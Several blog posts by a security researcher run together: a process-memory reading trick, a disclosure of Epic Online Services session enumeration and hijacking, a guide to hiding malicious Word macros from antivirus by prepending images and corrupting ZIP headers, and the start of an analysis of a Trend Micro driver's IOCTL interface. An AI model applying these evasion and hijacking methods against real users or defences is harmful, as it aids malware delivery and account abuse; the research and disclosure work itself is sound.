One approach I like to take with new research or methods I find that I haven't investigated thoroughly yet is to generate a SHA256 hash of the idea and then post it somewhere publicly where the timestamp is recorded. This way, in cases like this where my research conflicts with what another researcher was working on, I can always prove I discovered the trick on a certain date. In this case, on June 19th 2021, I posted a public GitHub gist of the following SHA256 hash:

D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7

You can read the memory of any process that you can open a PROCESS_CREATE_PROCESS handle to by calling NtCreateProcessEx using the process handle as the ParentHandle argument and providing NULL for the section argument.

If you generate a SHA256 hash of the quote above, you'll notice it matches the one I publicly posted back in June.

I have been waiting to publish this research because I am currently in the process of responsibly disclosing the issue to vendors whose products are impacted by this attack. Since the core theory of my research was shared publicly by @diversenok_zero, I decided it would be alright to share what I found around the technique as well.

Insecure by Design, Epic Games Peer-to-Peer Multiplayer Service

Bill Demirkapi — Thu, 17 Dec 2020 16:07:00 GMT

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

As someone who enjoys games that involve logistics, a recently-released game caught my eye. That game was Satisfactory, which is all about building up a massive factory on an alien planet from nothing. Since I loved my time with Factorio, another logistics-oriented game, Satisfactory seemed like a perfect fit!

Satisfactory had a unique feature that I rarely see in games today, peer-to-peer multiplayer sessions! Generally speaking, most games take the client-server approach of having dedicated servers serving multiple clients instead of the peer-to-peer model where clients serve each other.

I was curious to see how it worked under the hood. As a security researcher, one of my number one priorities is to always "stay curious" with anything I interact with. This was a perfect opportunity to exercise that curiosity!

Introduction

When analyzing the communication of any application, a great place to start is to attempt to intercept the HTTP traffic. Often times applications won't use an overly complicated protocol if they don't need to and web requests happen to be one of the most common ways of communicating. For intercepting not only plaintext traffic, I used Fiddler by Telerik which features a simple-to-use interface for intercepting HTTP(S) traffic. Fiddler took care of installing the root certificate it would use to issue certificates for websites automatically, but the question was if Satisfactory used a platform that had certificate pinning. Only one way to find out!

Lucky for us, the game did not have any certificate pinning mechanism. The first two requests appeared to query the latest game news from Coffee Stain Games, the creators of Satisfactory. I was sad to see that these requests were performed over HTTP, but fortunately did not contain sensitive information.

Taking a look at the other requests revealed that Satisfactory was authenticating with Epic Games. Perhaps they were using an Epic Games service for their multiplayer platform?

In the first request to Epic Games' API servers, there are a few interesting headers that indicate what service this could be in connection to. Specifically the User-Agent and Miscellaneous headers referred to something called "EOS". A quick Google search revealed that this stood for Epic Online Services!

Discovery

Epic Online Services is intended to assist game developers in creating multiplayer-compatible games by offering a platform that supports many common multiplayer features. Whether it be matchmaking, lobbies, peer-to-peer functionality, etc; there are many attractive features the service offers to game developers.

Before we continue with any security review, it's important to have a basic conceptual understanding of the product you're reviewing. This context can be especially helpful in later stages when trying to understand the inner workings of the product.

First, let's take a look at how you authenticate with the Epic Online Services API (EOS-API). According to documentation, the EOS Client uses OAuth Client Credentials to authenticate with the EOS-API. Assuming you have already set up a project in the EOS Developer Portal, you can generate credentials for either the GameServer or GameClient role , which are expected to be hardcoded into the server/client binary:

The EOS SDK requires a program to provide valid Client Credentials, including a Client ID and Client Secret. This information is passed in the the EOS_Platform_ClientCredentials structure, which is a parameter in the function EOS_Platform_Create. This enables the SDK to recognize the program as a valid EOS Client, authorize the Client with EOS, and grant access to the features enabled in the corresponding Client Role.

I found it peculiar that the only "client roles" that existed were GameServer and GameClient. The GameClient role "can access EOS information, but typically can't modify it", whereas the GameServer role "is a server or secure backend intended for administrative purposes". If you're writing a peer-to-peer game, what role do you give clients?

GameClient credentials won't work for hosting sessions, given that it's meant for read-only access, but GameServer credentials are only meant for "a server or secure backend". A peer-to-peer client is neither a server nor anything I'd call "secure", but Epic Games effectively forces developers to embed GameServer credentials, because otherwise how can peer-to-peer clients host sessions?

The real danger here is that the documentation falsely assumes that if a client has GameServer role, it should be trusted, when in fact the client may be an untrusted P2P client. I was amused by the fact that Epic Games even gives an example of the problem with giving untrusted clients the GameServer role:

The Client is a server or secure backend intended for administrative purposes. This type of Client can directly modify information on the EOS backend. For example, an EOS Client with a role of GameServer could unlock Achievements for a player.

Going back to those requests we intercepted earlier, the client credentials are pretty easy to extract.

In the authentication request above, the client credentials are simply embedded as a Base64-encoded string in the Authorization header. Decoding this string provides a username:password combination, which represents the client credentials. With such little effort, we are able to obtain credentials for the GameServer role giving significant access to the backend used for Satisfactory. We'll take a look at what we can do with GameServer credentials in a later section.

Since we're interested in peer-to-peer sessions/matchmaking, the next place to look is the "Sessions interface", which "gives players the ability to host, find, and interact with online gaming sessions". This Sessions interface can be obtained through the Platform interface function EOS_Platform_GetSessionsInterface. The core components of session creation that are high value targets include session creation, session discovery, and joining a session. Problems in these processes could have significant security impact.

Discovery: Session Creation

The first process to look at is session creation. Creating a session with the Sessions interface is relatively simple.

First, you create a EOS_Sessions_CreateSessionModificationOptions structure that contains the following information:

Finally, you need to pass this structure to the EOS_Sessions_CreateSessionModification function to create the session. Although this function will end up creating your session, there is a significant amount you can configure about a session given that the initial structure passed only contains required information to create a barebone session.

Discovery: Finding Sessions

For example, let's talk about how matchmaking works with these sessions. A major component of Sessions is the ability to add "custom attributes":

Sessions can contain user-defined data, called attributes. Each attribute has a name, which acts as a string key, a value, an enumerated variable identifying the value's type, and a visibility setting.

These "attributes" are what allows developers to add custom information about a session, such as the map the session is for or what version the host is running at.

EOS makes session searching simple. Similar to session creation, to create a barebone "session search", you simply call EOS_Sessions_CreateSessionSearch with a EOS_Sessions_CreateSessionSearchOptions structure. This structure has the minimum amount of information needed to perform a search, containing only the maximum number of search results to return.

Before performing a search, you can update the session search object to filter for specific properties. EOS allows you to search for session based on:

A known unique session identifier (at least 16 characters in length).
A known unique user identifier.
Session Attributes.

Although you can use a session identifier or a user identifier if you're joining a known specific session, for matchmaking purposes, attributes are the only way to "discover" sessions based on user-defined data.

Discovery: Sensitive Information Disclosure

Satisfactory isn't a matchmaking game and you'd assume they'd use the unique session identifier provided by the EOS-API. Unfortunately, until a month ago, EOS did not allow you to set a custom session identifier. Instead they forced game developers to use their randomly generated 32 character session ID.

When hosting a session in Satisfactory, hosts are given the option to set a custom session identifier. When joining a multiplayer session, besides joining via a friend, Satisfactory gives the option of using this session identifier to join sessions. How does this work in the background?

Although the EOS-API assigns a random session identifier to every newly created session, many implementations ignore it and choose to use attributes to store a session identifier. Being honest, who wants to share a random 32 character string with friends?

I decided the best way to figure out how Satisfactory handled unique session identifiers was to see what happens on the network when I attempt to join a custom session ID.

Here is the request performed when I attempted to join a session with the identifier "test123":

POST https://api.epicgames.dev/matchmaking/v1/[deployment id]/filter HTTP/1.1
Host: api.epicgames.dev
...headers removed...

{
  "criteria": [
    {
      "key": "attributes.NUMPUBLICCONNECTIONS_l",
      "op": "GREATER_THAN_OR_EQUAL",
      "value": 1
    },
    {
      "key": "bucket",
      "op": "EQUAL",
      "value": "Satisfactory_1.0.0"
    },
    {
      "key": "attributes.FOSS=SES_CSS_SESSIONID_s",
      "op": "EQUAL",
      "value": "test123"
    }
  ],
  "maxResults": 2
}

Of course, this returned no valid sessions, but this request interestingly revealed that the mechanism used for finding sessions was based on a set of criteria. I was curious, how much flexibility did the EOS-API give the client when it comes to this criteria?

Exploitation: Sensitive Information Disclosure

The first idea I had when I saw that filtering was based on an array of "criteria" was what happens when you specify no criteria? To my surprise, the EOS-API was quite accommodating:

Although sessions in Satisfactory are advertised to be "Friends-Only", I was able to enumerate all sessions that weren't set to "Private". Along with each session, I am given the IP Address for the host and their user identifier. On a large-scale basis, an attacker could easily use this information to create a map of most players.

To be clear, this isn't just a Satisfactory issue. You can enumerate the sessions of any game you have at least GameClient credentials for. Obviously in a peer-to-peer model, other players have the potential to learn your IP Address, but the problem here is that it is very simple to enumerate the thousands of sessions active given that besides the initial authentication, there are literally no access controls (not even rate-limiting). Furthermore, to connect to another client through the EOS-API, you don't even need to have the IP Address of the host!

Discovery: Session Hijacking

Going back to what we're really interested in, the peer-to-peer functionality of EOS, I was curious to learn what connecting to other clients actually looks like and what problems might exist with its design. Reading the "Sending and Receiving Data Through P2P Connections" section of the NAT P2P Interface documentation reveals that to connect to another player, we need their:

Product user ID - This "identifies player data for an EOS user within the scope of a single product".
Optional socket ID - This is a unique identifier for the specific socket to connect to. In common implementations of EOS, this is typically the randomly generated 32 character "session identifier".

Now that we know what data we need, the next step is understanding how the game itself shares these details between players.

One of the key features of the EOS Matchmaking/Session API we took a look at in a previous section is the existence of "Attributes", described by documentation to be a critical part of session discovery:

The most robust way to find sessions is to search based on a set of search parameters, which act as filters. Some parameters could be exposed to the user, such as enabling the user to select a certain game type or map, while others might be hidden, such as using the player's estimated skill level to find matches with appropriate opponents.

For peer-to-peer sessions, attributes are even more important, because they are the only way of carrying information about a session to other players. For a player to join another's peer-to-peer session, they need to retrieve the host's product user ID and an optional socket ID. Most implementations of Epic Online Services store this product user ID in the session's attributes. Of course, only clients with the GameServer role are allowed to create sessions and/or modify its attributes.

Exploitation: Session Hijacking

Recalling the first section, the core vulnerability and fundamental design flaw with EOS is that P2P games are required to embed GameServer credentials into their application. This means that theoretically speaking, an attacker can create a fake session with any attribute values they'd like. This got me thinking: if attributes are the primary way clients find sessions to join, then with GameServer credentials we can effectively "duplicate" existing sessions and potentially hijack the session clients find when searching for the original session.

Sound confusing? It is! Let's talk through a real-world example.

One widely used implementation of Epic Online Services is the "OnlineSubsystemEOS" (EOS-OSS) included with the Unreal Engine. This plugin is a very popular implementation widely used by games such as Satisfactory.

In Satisfactory's use of EOS-OSS, they use an attribute named SES_CSS_SESSIONID to track sessions. For example, if a player wanted their friend to join directly, they could give their friend a session ID from their client which the friend would be able to use to join. When the session ID search is executed, all that's happening is a filter query against all sessions for that session ID attribute value. Once the session has been found, EOS-OSS joins the session by retrieving the required product user ID of the host through another session attribute named OWNINGPRODUCTID.

Since Satisfactory is a peer-to-peer game exclusively using the Epic Online Services API, an attacker can use the credentials embedded in the binary to get access to the GameServer role. With a GameServer token, an attacker can hijack existing sessions by creating several "duplicate" sessions that have the same session ID attribute, however, have the OWNINGPRODUCTID attribute set to their own product user ID.

When a victim executes a search for the session with the right session ID, more likely than not, the query will return one of the duplicated sessions that has the attacker's product user ID (ordering of sessions is random). Thus, when the victim attempts to join the game, they will join the attacker's game instead!

This attack is quite more severe than it may seem, because it is trivial to script this attack to hijack all sessions at once and cause all players joining any session to join the attacker's session instead. To summarize, this fundamental design flaw allows attackers to:

Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
Prevent players from joining any "matchmaking session".

Remediation

When it comes to communication, Epic Games was one of the best vendors I have ever worked with. Epic Games consistently responded promptly, showed a high level of respect for my time, and was willing to extensively discuss the vulnerability. I can confidently say that the security team there is very competent and that I have no doubt of their skill. When it comes to actually "getting things done" and fixing these vulnerabilities, the response was questionable.

To my knowledge:

Epic Games has partially* remediated the sensitive information disclosure vulnerability, opting to use a custom addressing format for peer-to-peer hosts instead of exposing their real IP Address in the ADDRESS session attribute.
Epic Games has not remediated the session hijacking issue, however, they have released a new "Client Policy" mechanism, including a Peer2Peer policy intended for "untrusted client applications that want to host multiplayer matches". In practice, the only impact to the vulnerability is that there is an extra layer of authentication to perform it, requiring that the attacker be a user of the game (in contrast to only having client credentials). Epic Games has noted that they plan to "release additional tools to developers in future updates to the SDK, allowing them to further secure their products".

* If a new session does not set its own ADDRESS attribute, the EOS-API will automatically set their public IP Address as the ADDRESS attribute.

Instead of fixing the severe design flaw, Epic Games has opted to update their documentation with several warnings about how to use EOS correctly and add trivial obstacles for an attacker (i.e the user authentication required for session hijacking). Regardless of their warnings, the vulnerability is still in full effect. Here are a list of various notices Epic Games has placed in their documentation:

In the documentation for the Session interface, Epic Games has placed several warnings all stating that attackers can leak the IP Address of a peer-to-peer host or server.
Epic Games has created a brand new Matchmaking Security page which is a sub-page of the Session interface outlining:

Attackers may be able to access the IP Address and product user ID of a session host.
Attackers may be able to access any custom attributes set by game developers for a session.
Some "best practices" such as only expose information you need to expose.

Epic Games has transitioned to a new Client Policy model for authentication, including policies for untrusted clients.

Can this really be fixed?

I'd like to give Epic Games every chance to explain themselves with these questionable remediation choices. Here is the statement they made after reviewing this article.

Regarding P2P matchmaking, the issues you’ve outlined are faced by nearly all service providers in the gaming industry - at its core P2P is inherently insecure. The EOS matchmaking implementation follows industry standard practices. It's ultimately up to developers to implement appropriate checks to best suit their product. As previously mentioned, we are always working to improve the security around our P2P policy and all of our other matchmaking policies.

Unfortunately, I have a lot of problems with this statement:

Epic Games erroneously included the IP Address of peers in the session attributes, even though this information was never required in the first place. Exposing PII unnecessarily is certainly not an industry standard. At the end of the day, an attacker can likely figure out the IP of a client if they have their product user ID and socket ID, but Epic Games made it trivial for an attacker to enumerate and map an entire games' matchmaking system by including that unnecessary info.
"The EOS matchmaking implementation follows industry standard practices": The only access control present is a single layer of authentication...
Epic Games has yet to implement common mitigations such as rate-limiting.
There are an insane number of ways to insecurely implement Epic Online Services and Epic Games has documented none of these cases or how to defend against them. A great example is when games like Satisfactory store sensitive information like a session ID in the session's attributes.
The claim that the Session Hijacking issue cannot be remediated because "P2P is inherently insecure" is simply not true. It's not like you can't trust the central EOS-API server. Here is what Epic could do to remediate the Session Hijacking vulnerability:

A large requirement about the session hijacking attack is that an attacker must create multiple duplicate sessions that match the given attributes. An effective remediation is to limit the number of concurrent sessions a single user can have at once.
To prevent attackers from using multiple accounts to hijack a session to a singular session, Epic Games could enforce that the product user ID stored in the session must match the product user ID of the token the client is authenticating with.
To be clear, if Epic Games applied my suggested path of remediation, an attacker could still buy 10-20 copies of the game on different accounts to perform the attack on a small-scale. A large-scale attack would require thousands of copies to create enough fake hijacking sessions.
The point with this path of remediation is that it would significantly reduce the exploitability of this vulnerability, much more than a single layer of authentication provides.

Epic Games has yet to comment on these suggestions.

But... why?

When I first came across the design flaw that peer-to-peer games are required to embed GameServer credentials, I was curious to how such a fundamental flaw could have gotten past the initial design stage and decided to investigate.

After comparing the EOS landing page from its initial release in 2019 to the current page, it turns out that peer-to-peer functionality was not in the original release of Epic Online Services, but the GameClient and GameServer authentication model was!

It appears as though Epic Games simply didn't consider adding a new role dedicated for peer-to-peer hosts when designing the peer-to-peer functionality of the EOS-API.

Timeline

The timeline for this vulnerability is the following:

07/23/2020 - The vulnerability is reported to Epic Games.
07/28/2020 - The vulnerability is reproduced by HackerOne's triage team.
08/11/2020 - The vulnerability is officially triaged by Epic Games.
08/20/2020 - A disclosure timeline of 135 days is negotiated (for release in December 2020).
11/08/2020 - New impact/attack scenarios that are a result of this vulnerability are shared with Epic Games.
12/02/2020 - The vulnerability severity is escalated to Critical.
12/03/2020 - This publication is shared with Epic Games for review.
12/17/2020 - This publication is released to the public.

Frequently Asked Questions

Am I vulnerable?
If your game uses Epic Online Services, specifically its peer-to-peer or session/matchmaking functionality, you are likely vulnerable to some of the issues discussed in this article.

Epic Games has not remediated several issues discussed; opting to provide warnings in documentation instead of fixing the underlying problems in their platform.

What do I do if I am vulnerable?
If you're a player of the game, reach out to the game developers.

If you're a game or library developer, reach out to Epic Games for assistance. Make sure to review the documentation warnings Epic Games has added due to this vulnerability.

What is the potential impact of these vulnerabilities?
The vulnerabilities discussed in this article could be used to:

Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
Prevent players from joining any "matchmaking session".
Leak the user identifier and IP Address of any player hosting a session.

Defeating Macro Document Static Analysis with Pictures of My Cat

Bill Demirkapi — Wed, 16 Sep 2020 11:33:00 GMT

Over the past few weeks I've spent some time learning Visual Basic for Applications (VBA), specifically for creating malicious Word documents to act as an initial stager. When taking operational security into consideration and brainstorming ways of evading macro detection, I had the question, how does anti-virus detect a malicious macro?

The hypothesis I came up with was that anti-virus would parse out macro content from the word document and scan the macro code for a variety of malicious techniques, nothing crazy. A common pattern I've seen attackers counter this sort-of detection is through the use of macro obfuscation, which is effectively scrambling macro content in an attempt to evade the malicious patterns anti-virus looks for.

The questions I wanted answered were:

How does anti-virus even retrieve the macro content?
What differences are there for the retrieval of macro content between the implementation in Microsoft Word and anti-virus?

Discovery

According to Wikipedia,Open Office XML (OOX) "is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations and word processing documents". This is the file format used for the common Microsoft Word extensions docx and docm. The fact that Microsoft Office documents were essentially a zip file of XML files certainly piqued my interest.

Since the OOX format is just a zip file, I found that parsing macro content from a Microsoft Word document was simpler than you might expect. All an anti-virus would need to do is:

Extract the Microsoft Office document as a ZIP and look for the file word\vbaProject.bin.
Parse the OLE binary and extract the macro content.

The differences I was interested in was how the methods would handle errors and corruption. For example, common implementations of ZIP extraction will often have error checking such as:

Does the local file header begin with the signature 0x04034b50?
Is the minimum version bytes greater than what is supported?

What I was really after was finding ways to break the ZIP parser in anti-virus without breaking the ZIP parser used by Microsoft Office.

Before we get into corrupting anything, we need a base sample first. As an example, I simply wrote a basic macro "Hello World!" that would appear when the document was opened.

For the purposes of testing detection of macros, I needed another sample document that was heavily detected by anti-virus. After a quick google search, I found a few samples shared by @malware_traffic here. The sample named HSOTN2JI.docm had the highest detection rate, coming in at 44/61 engines marking the document as malicious.

To ensure that detections were specifically based on the malicious macro inside the document's vbaProject.bin OLE file, I...

Opened both my "Hello World" and the HSOTN2JI macro documents as ZIP files.
Replaced the vbaProject.bin OLE file in my "Hello World" macro document with the vbaProject.bin from the malicious HSOTN2JI macro document.

Running the scan again resulted in the following detection rate:

Fortunately, these anti-virus products were detecting the actual macro and not solely relying on conventional methods such as blacklisting the hash of the document. Now with a base malicious sample, we can begin tampering with the document.

Exploitation

The methodology I used for the methods of corruption is:

Modify the original base sample file with the corruption method.
Verify that the document still opens in Microsoft Word.
Upload the new document to VirusTotal.
If good results, retry the method on my original "Hello World" macro document and verify that the macro still works.

Before continuing, it's important to note that the methods discussed in this blog post does come with drawbacks, specifically:

Whenever a victim opens a corrupted document, they will receive a prompt asking whether or not they'd like to recover the document:

Before the macro is executed, the victim will be prompted to save the recovered document. Once the victim has saved the recovered document, the macro will execute.

Although adding any user interaction certainly increases the complexity of the attack, if a victim was going to enable macros anyway, they'd probably also be willing to recover the document.

General Corruption

We'll first start with the effects of general corruption on a Microsoft Word document. What I mean by this is I'll be corrupting the file using methods that are non-specific to the ZIP file format.

First, let's observe the impact of adding random bytes to the beginning of the file.

With a few bytes at the beginning of the document, we were able to decrease detection by about 33%. This made me confident that future attempts could reduce this even further.

Result: 33% decrease in detection

Prepending My Cat

This time, let's do the same thing except prepend a JPG file, in this case, a photo of my cat!

You might think that prepending some random data should result in the same detection rate as an image, but some anti-virus marked the file as clean as soon as they saw an image.

To aid in future research, the anti-virus engines that marked the random data document as malicious but did not mark the cat document as malicious were:

Ad-Aware
ALYac
DrWeb
eScan
McAfee
Microsoft
Panda
Qihoo-360
Sophos ML
Tencent
VBA32

The reason this list is larger than the actual difference in detection is because some engines strangely detected this cat document, but did not detect the random data document.

Result: 50% decrease in detection

Prepending + Appending My Cat

Purely appending data to the end of a macro document barely impacts the detection rate, instead we'll be combining appending data with other methods starting with my cat.

What was shocking about all of this was even when the ZIP file was in the middle of two images, Microsoft's parser was able to reliably recover the document and macro! With only extremely basic modification to the document, we were able to essentially prevent most detection of the macro.

Result: 88% decrease in detection

Zip Corruption

Microsoft's fantastic document recovery is not just exclusive to general methods of file corruption. Let's take a look at how it handles corruption specific to the ZIP file format.

Corrupting the ZIP Local File Header

The only file we care about preventing access to is the vbaProject.bin file, which contains the malicious macro. Without corrupting the data, could we corrupt the file header for the vbaProject.bin file and still have Microsoft Word recognize the macro document?

Let's take a look at the structure of a local file header from Wikipedia:

I decided that the local file header signature would be the least likely to break file parsing, hoping that Microsoft Word didn't care whether or not the file header had the correct magic value. If Microsoft Word didn't care about the magic, corrupting it had a high chance of interfering with ZIP parsers that have integrity checks such as verifying the value of the magic.

After corrupting only the file header signature of the vbaProject.bin file entry, we get the following result:

With a ZIP specific corruption method, we almost completely eliminated detection.

Result: 90% decrease in detection

Combining Methods

With all of these methods, we've been able to reduce static detection of malicious macro documents quite a bit, but it's still not 100%. Could these methods be combined to achieve even lower rates of detection? Fortunately, yes!

Method	Detection Rate Decrease
Prepending Random Bytes	33%
Prepending an Image	50%
Prepending and Appending an Image	88%
Corrupting ZIP File Header	90%
Prepending/Appending Image and Corrupting ZIP File Header	100%

Interested in trying out the last corruption method that reduced detection by 100%? I made a script to do just that! To use it, simply execute the script providing document filename as the first argument and a picture filename for the second parameter. The script will spit out the patched document to your current directory.

As stated before, even though these methods can bring down the detection of a macro document to 0%, it comes with high costs to attack complexity. A victim will not only need to click to recover the document, but will also need to save the recovered document before the malicious macro executes. Whether or not that added complexity is worth it for your team will widely depend on the environment you're against.

Regardless, one must heavily applaud the team working on Microsoft Office, especially those who designed the fantastic document recovery functionality. Even when compared to tools that are specifically designed to recover ZIP files, the recovery capability in Microsoft Office exceeds all expectations.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

Bill Demirkapi — Mon, 18 May 2020 15:32:00 GMT

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

For a recent project, I had to do research into methods rootkits are detected and the most effective measures to catch them when I asked the question, what are some existing solutions to rootkits and how do they function? My search eventually landed me on the TrendMicro RootkitBuster which describes itself as "A free tool that scans hidden files, registry entries, processes, drivers, and the master boot record (MBR) to identify and remove rootkits".

The features it boasted certainly caught my attention. They were claiming to detect several techniques rootkits use to burrow themselves into a machine, but how does it work under the hood and can we abuse it? I decided to find out by reverse engineering core components of the application itself, leading me down a rabbit hole of code that scarred me permanently, to say the least.

Discovery

Starting the adventure, launching the application resulted in a fancy warning by Process Hacker that a new driver had been installed.

Already off to a good start, we got a copy of Trend Micro's "common driver", this was definitely something to look into. Besides this driver being installed, this friendly window opened prompting me to accept Trend Micro's user agreement.

I wasn't in the mood to sign away my soul to the devil just yet, especially since the terms included a clause stating "You agree not to attempt to reverse engineer, decompile, modify, translate, disassemble, discover the source code of, or create derivative works from...".

Thankfully, Trend Micro already deployed their software on to my machine before I accepted any terms. Funnily enough, when I tried to exit the process by right-clicking on the application and pressing "Close Window", it completely evaded the license agreement and went to the main screen of the scanner, even though I had selected the "I do not accept the terms of the license agreement" option. Thanks Trend Micro!

I noticed a quick command prompt flash when I started the application. It turns out this was the result of a 7-Zip Self Extracting binary which extracted the rest of the application components to %TEMP%\RootkitBuster.

Let's review the driver we'll be covering in this article.

The tmcomm driver which was labeled as the "TrendMicro Common Module" and "Trend Micro Eyes". A quick overlook of the driver indicated that it accepted communication from privileged user-mode applications and performed common actions that are not specific to the Rootkit Remover itself. This driver is not only used in the Rootkit Buster and is implemented throughout Trend Micro's product line.

In the following sections, we'll be deep diving into the tmcomm driver . We'll focus our research into finding different ways to abuse the driver's functionality, with the end goal being able to execute kernel code. I decided not to look into the tmrkb.sys because although I am sure it is vulnerable, it seems to only be used for the Rootkit Buster.

TrendMicro Common Module (tmcomm.sys)

Let's begin our adventure with the base driver that appears to be used not only for this Rootkit Remover utility, but several other Trend Micro products as well. As I stated in the previous section, a very brief look-over of the driver revealed that it does allow for communication from privileged user-mode applications.

One of the first actions the driver takes is to create a device to accept IOCTL communication from user-mode. The driver creates a device at the path \Device\TmComm and a symbolic link to the device at \DosDevices\TmComm (accessible via \\.\Global\TmComm). The driver entrypoint initializes a significant amount of classes and structure used throughout the driver, however, for our purposes, it is not necessary to cover each one.

I was happy to see that Trend Micro made the correct decision of restricting their device to the SYSTEM user and Administrators. This meant that even if we did find exploitable code, because any communication would require at least Administrative privileges, a significant amount of the industry would not consider it a vulnerability. For example, Microsoft themselves do not consider Administrator to Kernel to be a security boundary because of the significant amount of access they get. This does not mean however exploitable code in Trend Micro's drivers won't be useful.

TrueApi

A large component of the driver is its "TrueApi" class which is instantiated during the driver's entrypoint. The class contains pointers to imported functions that get used throughout the driver. Here is a reversed structure:

struct TrueApi
{
	BYTE Initialized;
	PVOID ZwQuerySystemInformation;
	PVOID ZwCreateFile;
	PVOID unk1; // Initialized as NULL.
	PVOID ZwQueryDirectoryFile;
	PVOID ZwClose;
	PVOID ZwOpenDirectoryObjectWrapper;
	PVOID ZwQueryDirectoryObject;
	PVOID ZwDuplicateObject;
	PVOID unk2; // Initialized as NULL.
	PVOID ZwOpenKey;
	PVOID ZwEnumerateKey;
	PVOID ZwEnumerateValueKey;
	PVOID ZwCreateKey;
	PVOID ZwQueryValueKey;
	PVOID ZwQueryKey;
	PVOID ZwDeleteKey;
	PVOID ZwTerminateProcess;
	PVOID ZwOpenProcess;
	PVOID ZwSetValueKey;
	PVOID ZwDeleteValueKey;
	PVOID ZwCreateSection;
	PVOID ZwQueryInformationFile;
	PVOID ZwSetInformationFile;
	PVOID ZwMapViewOfSection;
	PVOID ZwUnmapViewOfSection;
	PVOID ZwReadFile;
	PVOID ZwWriteFile;
	PVOID ZwQuerySecurityObject;
	PVOID unk3; // Initialized as NULL.
	PVOID unk4; // Initialized as NULL.
	PVOID ZwSetSecurityObject;
};

Looking at the code, the TrueApi is primarily used as an alternative to calling the functions directly. My educated guess is that Trend Micro is caching these imported functions at initialization to evade delayed IAT hooks. Since the TrueApi is resolved by looking at the import table however, if there is a rootkit that hooks the IAT on driver load, this mechanism is useless.

XrayApi

Similar to the TrueApi, the XrayApi is another major class in the driver. This class is used to access several low-level devices and to interact directly with the filesystem. A major component of the XrayConfig is its "config". Here is a partially reverse-engineered structure representing the config data:

struct XrayConfigData
{
	WORD Size;
	CHAR pad1[2];
	DWORD SystemBuildNumber;
	DWORD UnkOffset1;
	DWORD UnkOffset2;
	DWORD UnkOffset3;
	CHAR pad2[4];
	PVOID NotificationEntryIdentifier;
	PVOID NtoskrnlBase;
	PVOID IopRootDeviceNode;
	PVOID PpDevNodeLockTree;
	PVOID ExInitializeNPagedLookasideListInternal;
	PVOID ExDeleteNPagedLookasideList;
	CHAR unkpad3[16];
	PVOID KeAcquireInStackQueuedSpinLockAtDpcLevel;
	PVOID KeReleaseInStackQueuedSpinLockFromDpcLevel;
	...
};

The config data stores the location of internal/undocumented variables in the Windows Kernel such as the IopRootDeviceNode, PpDevNodeLockTree, ExInitializeNPagedLookasideListInternal, and ExDeleteNPagedLookasideList. My educated guess for the purpose of this class is to access low-level devices directly rather than use documented methods which could be hijacked.

IOCTL Requests

Before we get into what the driver allows us to do, we need to understand how IOCTL requests are handled.

In the primary dispatch function, the Trend Micro driver converts the data alongside a IRP_MJ_DEVICE_CONTROL request to a proprietary structure I call a TmIoctlRequest.

struct TmIoctlRequest
{
	DWORD InputSize;
	DWORD OutputSize;
	PVOID UserInputBuffer;
	PVOID UserOutputBuffer;
	PVOID Unused;
	DWORD_PTR* BytesWritten;
};

The way Trend Micro organized dispatching of IOCTL requests is by having several "dispatch tables". The "base dispatch table" simply contains an IOCTL Code and a corresponding "sub dispatch function". For example, when you send an IOCTL request with the code 0xDEADBEEF, it will compare each entry of this base dispatch table and pass along the data if there is a table entry that has the matching code. A base table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *DispatchFunction_t)(TmIoctlRequest *IoctlRequest);

struct BaseDispatchTableEntry
{
	DWORD_PTR IOCode;
	DispatchFunction_t DispatchFunction;
};

After the DispatchFunction is called, it typically verifies some of the data provided ranging from basic nullptr checks to checking the size of the input and out buffers. These "sub dispatch functions" then do another lookup based on a code passed in the user input buffer to find the corresponding "sub table entry". A sub table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *OperationFunction_t)(PVOID InputBuffer, PVOID OutputBuffer);

struct SubDispatchTableEntry
{
	DWORD64 OperationCode;
	OperationFunction_t PrimaryRoutine;
	OperationFunction_t ValidatorRoutine;
};

Before calling the PrimaryRoutine, which actually performs the requested action, the sub dispatch function calls the ValidatorRoutine. This routine does "action-specific" validation on the input buffer, meaning that it performs checks on the data the PrimaryRoutine will be using. Only if the ValidatorRoutine returns successfully will the PrimaryRoutine be called.

Now that we have a basic understanding of how IOCTL requests are handled, let's explore what they allow us to do. Referring back to the definition of the "base dispatch table", which stores "sub dispatch functions", let's explore each base table entry and figure out what each sub dispatch table allows us to do!

IoControlCode == 9000402Bh

Discovery

This first dispatch table appears to interact with the filesystem, but what does that actually mean? To start things off, the code for the "sub dispatch table" entry is obtained by dereferencing a DWORD from the start of the input buffer. This means that to specify which sub dispatch entry you'd like to execute, you simply need to set a DWORD at the base of the input buffer to correspond with that entries' **OperationCode**.

To make our lives easier, Trend Micro conveniently included a significant amount of debugging strings, often giving an idea of what a function does. Here is a table of the functions I reversed in this sub dispatch table and what they allow us to do.

OperationCode	PrimaryRoutine	Description
2713h	IoControlCreateFile	Calls NtCreateFile, all parameters are controlled by the request.
2711h	IoControlFindNextFile	Returns STATUS_NOT_SUPPORTED.
2710h	IoControlFindFirstFile	Performs nothing, returns STATUS_SUCCESS always.
2712h	IoControlFindCloseFile	Calls ZwClose, all parameters are controlled by the request.
2715h	IoControlReadFileIRPNoCache	References a FileObject using HANDLE from request. Calls IofCallDriver and reads result.
2714h	IoControlCreateFileIRP	Creates a new FileObject and associates DeviceObject for requested drive.
2716h	IoControlDeleteFileIRP	Deletes a file by sending an IRP_MJ_SET_INFORMATION request.
2717h	IoControlGetFileSizeIRP	Queries a file's size by sending an IRP_MJ_QUERY_INFORMATION request.
2718h	IoControlSetFilePosIRP	Set's a file's position by sending an IRP_MJ_SET_INFORMATION request.
2719h	IoControlFindFirstFileIRP	Returns STATUS_NOT_SUPPORTED.
271Ah	IoControlFindNextFileIRP	Returns STATUS_NOT_SUPPORTED.
2720h	IoControlQueryFile	Calls NtQueryInformationFile, all parameters are controlled by the request.
2721h	IoControlSetInformationFile	Calls NtSetInformationFile, all parameters are controlled by the request.
2722h	IoControlCreateFileOplock	Creates an Oplock via IoCreateFileEx and other filesystem API.
